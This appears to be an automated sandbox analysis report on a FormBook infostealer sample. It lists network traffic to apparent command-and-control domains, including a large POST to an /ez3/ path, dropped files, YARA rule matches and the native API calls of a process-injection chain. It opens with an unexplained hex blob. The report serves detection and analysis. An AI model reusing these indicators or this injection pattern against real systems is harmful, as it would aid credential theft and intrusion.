47 5a 61 67 63 4c 61 44 4d 32 6e 58 75 6c 56 7e 70 62 49 48 45 54 4a 69 6b 50 37 53 78 67 71 6a 32 63 73 28 49 58 6c 49 37 46 79 4c 6a 4a 30 61 2d 35 45 45 79 33 75 76 63 6f 77 6a 30 7a 31 4d 59 6b 4f 69 39 76 74 46 54 58 33 46 48 30 78 4c 4b 79 75 76 53 4a 72 54 4b 6e 4a 69 38 61 4a 4e 4e 49 4e 72 36 53 56 64 72 4c 37 48 39 53 37 37 4d 61 6b 39 7a 58 63 6c 64 42 59 71 59 43 4b 33 61 45 77 49 59 5a 31 57 31 62 71 34 
6b 57 64 57 72 30 64 78 39 39 45 66 48 55 6f 6a 63 71 5f 46 48 69 6e 5a 6d 7e 51 35 70 77 33 36 5f 78 74 43 4e 4d 59 63 64 42 44 49 4d 4a 34 53 38 4d 34 4c 36 46 39 38 6c 4c 78 6b 41 48 69 28 6c 6a 31 37 65 33 6a 48 65 31 39 7e 51 6b 54 4d 74 4e 34 4d 5a 70 53 65 73 68 73 64 4a 39 68 33 6d 6c 67 37 49 7a 68 43 49 58 71 4f 46 66 4c 64 6c 79 69 6f 68 47 78 77 78 75 54 5a 65 7e 6a 34 76 6d 2d 72 7a 6a 5f 65 36 70 62 54 6c 67 79 67 4a 30 59 43 43 31 30 36 56 4d 79 6b 62 64 51 6b 34 78 38 55 34 78 5f 42 6f 30 53 67 43 54 79 4e 6a 6e 33 39 54 4e 31 73 67 31 4d 71 74 36 4e 57 4a 67 4a 65 46 45 37 73 66 75 6f 58 2d 39 58 43 4f 31 59 68 33 46 78 41 30 66 47 51 39 67 32 6c 44 62 31 33 7a 6a 38 7e 63 42 74 74 68 69 47 37 58 33 55 52 58 44 37 44 6a 6f 4d 4b 77 78 65 6c 69 61 34 74 58 59 47 31 54 58 32 38 38 58 33 45 47 50 73 49 72 61 50 52 69 37 39 53 53 71 6d 74 78 4a 56 76 69 53 75 6d 79 6f 63 49 65 63 2d 6c 6b 31 35 54 6a 41 4c 32 75 75 36 6b 6c 52 45 4b 78 49 51 4b 77 56 70 35 41 6f 30 62 33 51 43 59 31 78 4d 6b 76 68 71 6e 5
Source: unknown | DNS traffic detected: queries for: www.oraning.net
          Source: unknownHTTP traffic detected: POST /ez3/ HTTP/1.1Host: www.lcpierpontphotography.comConnection: closeContent-Length: 153125Cache-Control: no-cacheOrigin: http://www.lcpierpontphotography.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.lcpierpontphotography.com/ez3/Accept-Language: en-USAccept-Encoding: gzip, deflate
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Tue, 19 May 2020 08:38:38 GMTConnection: closeContent-Length: 1245
          Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: svchost.exe, 00000005.00000002.2486714198.00000000035A9000.00000004.00000001.sdmpString found in binary or memory: http://www.allixanes.com
          Source: svchost.exe, 00000005.00000002.2486714198.00000000035A9000.00000004.00000001.sdmpString found in binary or memory: http://www.allixanes.com/ez3/
          Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000004.00000000.889874232.0000000007B92000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: svchost.exe, 00000005.00000002.2481178360.0000000000827000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp
          Source: svchost.exe, 00000005.00000002.2481178360.0000000000827000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
          Source: svchost.exe, 00000005.00000002.2481178360.0000000000827000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/ocid=iehpC:
          Source: svchost.exe, 00000005.00000002.2481178360.0000000000827000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/ocid=iehp
          Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 0_2_00449F24 GetKeyboardState,0_2_00449F24
          Source: sdv88p2lg.exe, 0000000E.00000002.1485735250.0000000000790000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara matchFile source: 00000003.00000002.922461838.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.1485946489.0000000002270000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2479604719.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2481636727.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.922551051.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.1506249884.0000000000A30000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2481462321.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.1506020051.00000000007A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.1487281055.0000000002600000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.865204916.0000000002200000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000001.1483312311.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.1503710394.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.1503886889.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.923330823.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000001.862672381.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.865480989.00000000023E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.xg28sL5JDm.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.1.sdv88p2lg.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.1.sdv88p2lg.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.sdv88p2lg.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.xg28sL5JDm.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.xg28sL5JDm.exe.2200000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.sdv88p2lg.exe.2600000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.xg28sL5JDm.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.xg28sL5JDm.exe.2200000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.sdv88p2lg.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.sdv88p2lg.exe.2270000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.sdv88p2lg.exe.2270000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.xg28sL5JDm.exe.23e0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.xg28sL5JDm.exe.23e0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.xg28sL5JDm.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.sdv88p2lg.exe.2600000.3.unpack, type: UNPACKEDPE

          System Summary:

          Detected FormBook malware
          Source: C:\Windows\SysWOW64\svchost.exeDropped file: C:\Users\user\AppData\Roaming\K4O1B2B4\K4Ologri.ini
          Source: C:\Windows\SysWOW64\svchost.exeDropped file: C:\Users\user\AppData\Roaming\K4O1B2B4\K4Ologrf.ini
          Source: C:\Windows\SysWOW64\svchost.exeDropped file: C:\Users\user\AppData\Roaming\K4O1B2B4\K4Ologrv.ini
          Malicious sample detected (through community Yara rule)
          Source: 00000003.00000002.922461838.00000000001D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.922461838.00000000001D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.1485946489.0000000002270000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.1485946489.0000000002270000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2479604719.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2479604719.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2481636727.0000000000A30000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2481636727.0000000000A30000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.922551051.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.922551051.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.1506249884.0000000000A30000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.1506249884.0000000000A30000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2481462321.0000000000A00000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2481462321.0000000000A00000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000002.1506020051.00000000007A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000002.1506020051.00000000007A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.1487281055.0000000002600000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.1487281055.0000000002600000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.865204916.0000000002200000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.865204916.0000000002200000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000001.1483312311.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000001.1483312311.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.1503710394.00000000001D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.1503710394.00000000001D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.1503886889.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.1503886889.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.923330823.00000000005B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.923330823.00000000005B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000001.862672381.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000001.862672381.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.865480989.00000000023E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.865480989.00000000023E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.xg28sL5JDm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.xg28sL5JDm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 15.1.sdv88p2lg.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 15.1.sdv88p2lg.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 15.1.sdv88p2lg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 15.1.sdv88p2lg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 15.2.sdv88p2lg.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 15.2.sdv88p2lg.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.1.xg28sL5JDm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.1.xg28sL5JDm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.xg28sL5JDm.exe.2200000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.xg28sL5JDm.exe.2200000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 14.2.sdv88p2lg.exe.2600000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 14.2.sdv88p2lg.exe.2600000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.1.xg28sL5JDm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.1.xg28sL5JDm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.xg28sL5JDm.exe.2200000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.xg28sL5JDm.exe.2200000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 15.2.sdv88p2lg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 15.2.sdv88p2lg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 14.2.sdv88p2lg.exe.2270000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 14.2.sdv88p2lg.exe.2270000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 14.2.sdv88p2lg.exe.2270000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 14.2.sdv88p2lg.exe.2270000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.xg28sL5JDm.exe.23e0000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.xg28sL5JDm.exe.23e0000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.xg28sL5JDm.exe.23e0000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.xg28sL5JDm.exe.23e0000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.xg28sL5JDm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.xg28sL5JDm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 14.2.sdv88p2lg.exe.2600000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 14.2.sdv88p2lg.exe.2600000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 0_2_00467724 NtdllDefWindowProc_A,0_2_00467724
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 0_2_0045CA34 GetSubMenu,SaveDC,RestoreDC,7337B080,SaveDC,RestoreDC,NtdllDefWindowProc_A,0_2_0045CA34
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 0_2_0044CEA0 NtdllDefWindowProc_A,GetCapture,0_2_0044CEA0
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 0_2_0042D764 NtdllDefWindowProc_A,0_2_0042D764
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 0_2_00467ECC IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,0_2_00467ECC
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 0_2_00467F7C IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,0_2_00467F7C
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00416B50 NtCreateFile,3_2_00416B50
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00416C00 NtReadFile,3_2_00416C00
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00416C80 NtClose,3_2_00416C80
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00416D30 NtAllocateVirtualMemory,3_2_00416D30
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00416B4D NtCreateFile,3_2_00416B4D
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00416C7A NtClose,3_2_00416C7A
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAA2D0 NtClose,LdrInitializeThunk,3_2_00AAA2D0
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAA240 NtReadFile,LdrInitializeThunk,3_2_00AAA240
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAA3E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_00AAA3E0
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAA360 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_00AAA360
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAA4A0 NtUnmapViewOfSection,LdrInitializeThunk,3_2_00AAA4A0
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAA480 NtMapViewOfSection,LdrInitializeThunk,3_2_00AAA480
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAA410 NtQueryInformationToken,LdrInitializeThunk,3_2_00AAA410
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAA5F0 NtReadVirtualMemory,LdrInitializeThunk,3_2_00AAA5F0
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAA560 NtQuerySystemInformation,LdrInitializeThunk,3_2_00AAA560
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAA540 NtDelayExecution,LdrInitializeThunk,3_2_00AAA540
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAA6A0 NtCreateSection,LdrInitializeThunk,3_2_00AAA6A0
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAA610 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_00AAA610
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAA720 NtResumeThread,LdrInitializeThunk,3_2_00AAA720
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAA700 NtProtectVirtualMemory,LdrInitializeThunk,3_2_00AAA700
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAA750 NtCreateFile,LdrInitializeThunk,3_2_00AAA750
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAB0B0 NtGetContextThread,3_2_00AAB0B0
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAA800 NtSetValueKey,3_2_00AAA800
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAA2F0 NtQueryInformationFile,3_2_00AAA2F0
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAA220 NtWaitForSingleObject,3_2_00AAA220
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AABA30 NtSetContextThread,3_2_00AABA30
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAA260 NtWriteFile,3_2_00AAA260
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAA3D0 NtCreateKey,3_2_00AAA3D0
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAA310 NtEnumerateValueKey,3_2_00AAA310
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAA370 NtQueryInformationProcess,3_2_00AAA370
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAA350 NtQueryValueKey,3_2_00AAA350
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAACE0 NtCreateMutant,3_2_00AAACE0
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAA430 NtQueryVirtualMemory,3_2_00AAA430
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAB410 NtOpenProcessToken,3_2_00AAB410
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAA460 NtOpenProcess,3_2_00AAA460
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAA470 NtSetInformationFile,3_2_00AAA470
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAB470 NtOpenThread,3_2_00AAB470
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAA5A0 NtWriteVirtualMemory,3_2_00AAA5A0
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAA520 NtEnumerateKey,3_2_00AAA520
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AABD40 NtSuspendThread,3_2_00AABD40
          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 3_2_00AAA6D0 NtCreateProcessEx,3_2_00AAA6D0
          Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_2_00AAA650 NtQueueApcThread,3_2_00AAA650
          Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_2_00AAA780 NtOpenDirectoryObject,3_2_00AAA780
          Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_2_00AAA710 NtQuerySection,3_2_00AAA710
          Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_1_00416B50 NtCreateFile,3_1_00416B50
          Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_1_00416C00 NtReadFile,3_1_00416C00
          Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_1_00416C80 NtClose,3_1_00416C80
          Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_1_00416D30 NtAllocateVirtualMemory,3_1_00416D30
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A2D0 NtClose,LdrInitializeThunk,5_2_02F6A2D0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A260 NtWriteFile,LdrInitializeThunk,5_2_02F6A260
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A240 NtReadFile,LdrInitializeThunk,5_2_02F6A240
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A3E0 NtFreeVirtualMemory,LdrInitializeThunk,5_2_02F6A3E0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A3D0 NtCreateKey,LdrInitializeThunk,5_2_02F6A3D0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A360 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_02F6A360
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A350 NtQueryValueKey,LdrInitializeThunk,5_2_02F6A350
